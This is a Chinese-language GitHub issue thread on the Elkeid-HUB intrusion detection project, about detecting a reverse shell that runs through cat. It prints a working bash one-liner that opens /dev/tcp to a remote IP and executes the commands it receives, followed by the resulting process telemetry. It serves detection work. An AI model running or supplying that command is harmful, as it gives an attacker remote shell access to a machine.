### ISSUE TITLE
cat 反弹shell规则的判断

### ISSUE THREAD

**Issue by wcc526** [bytedance/Elkeid-HUB#6]
exec 5<>/dev/tcp/10.71.5.222/666;cat <&5|while read line;do $line >&5 2>&1;done

{
            "bootTime":"2022-01-19 19:11:31.000",
            "cmdline":"cat",
            "cwd":"/",
            "exe":"/usr/bin/cat",
            "fd_num":"1",
            "name":"cat",
            "pid":"12778",
            "ppid":"50250",
            "r_addr_ip":"10.71.5.222",
            "r_addr_port":"666",
            "session":"50250",
            "stderr":"/dev/pts/0",
            "stdin":"socket:[583396364]",
            "stdout":"pipe:[583396365]",
            "terminal":"/pts/0",
            "username":"root"
        },

这种反弹shell如何判断比较好？没有进程命令行特征，直接判断cat 输入有重定向？

**Comment by whitelez** [comment]
Hi,
这种反弹shell的检测可以通过执行正常cat行为，对比看看Exec 反弹shell中cat的输入，Elkeid数据中具有直接的体现。
因为我们不方便开源更多的策略，这里如果同学有成功的策略可以提Merge Request，社区提交的策略会直接标注作者ID的。
感谢建议，
Elkeid Team
